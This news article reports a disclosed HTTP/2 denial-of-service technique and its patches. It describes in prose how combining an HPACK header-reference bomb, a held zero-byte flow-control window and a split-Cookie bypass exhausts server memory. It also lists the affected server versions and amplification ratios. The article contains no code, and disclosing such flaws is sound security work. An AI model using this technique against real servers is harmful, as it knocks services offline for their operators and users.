A newly disclosed remote denial-of-service (DoS) exploit, termed the “HTTP/2 Bomb,” has been identified as a significant threat to widely used web servers, including nginx, Apache httpd, Microsoft IIS, Envoy, and Cloudflare Pingora. This exploit enables a single attacker to rapidly exhaust tens of gigabytes of server memory, potentially leading to severe service disruptions.
Understanding the HTTP/2 Bomb Exploit
The HTTP/2 Bomb combines two known techniques: an HPACK compression bomb and a Slowloris-style connection hold. HPACK, as defined in RFC 7541, is HTTP/2’s header compression scheme that maintains a dynamic table of headers. The exploit manipulates this by inserting a header and then referencing it thousands of times within a single request. This forces the server to allocate substantial memory for each reference, with the impact varying across servers. For instance, nginx, IIS, and Pingora allocate approximately 70 bytes per reference, while Apache httpd and Envoy allocate up to 4,000 bytes.
The second component of the exploit targets HTTP/2’s per-stream flow control, as outlined in RFC 9113. By advertising a zero-byte flow-control window, the attacker prevents the server from completing its response. A continuous trickle of 1-byte WINDOW_UPDATE frames resets the send timeout, causing the server to retain the allocated memory indefinitely, thereby amplifying the attack’s effectiveness.
Impact on Web Servers
The exploit’s impact varies among different web servers. For example, Envoy 1.37.2 can experience a memory amplification ratio of approximately 5,700:1, leading to 32 GB of memory consumption in about 10 seconds. Apache httpd 2.4.67 shows a ratio of around 4,000:1, consuming 32 GB in 18 seconds. Nginx 1.29.7 and Microsoft IIS (Windows Server 2025) exhibit ratios of approximately 70:1 and 68:1, respectively, each consuming 32 GB and 64 GB in about 45 seconds.
A Shodan analysis identified over 880,000 public-facing websites supporting HTTP/2 and running one of these servers. While many are protected by Content Delivery Networks (CDNs), reducing direct exposure, the risk remains significant.
For servers that limit the number of header fields rather than the decoded size, such as Apache and Envoy, the exploit utilizes a ‘Cookie’ header bypass. RFC 9113 ยง8.2.3 permits splitting a Cookie header into multiple fields, which these servers do not count against field limits. This allows the exploit to bypass existing protections and achieve high amplification ratios.
Following responsible disclosure on May 27, 2026, Apache httpd assigned CVE-2026-49975 to this vulnerability and promptly committed a fix. Nginx addressed the issue in version 1.29.8 by introducing the ‘max_headers’ directive with a default limit of 1,000 headers.
Given the widespread use of HTTP/2 and the servers affected, this exploit underscores the importance of continuous vigilance and prompt patching in cybersecurity. Administrators should ensure their systems are updated to the latest versions to mitigate potential risks associated with the HTTP/2 Bomb exploit.
Source: Cyber Security News
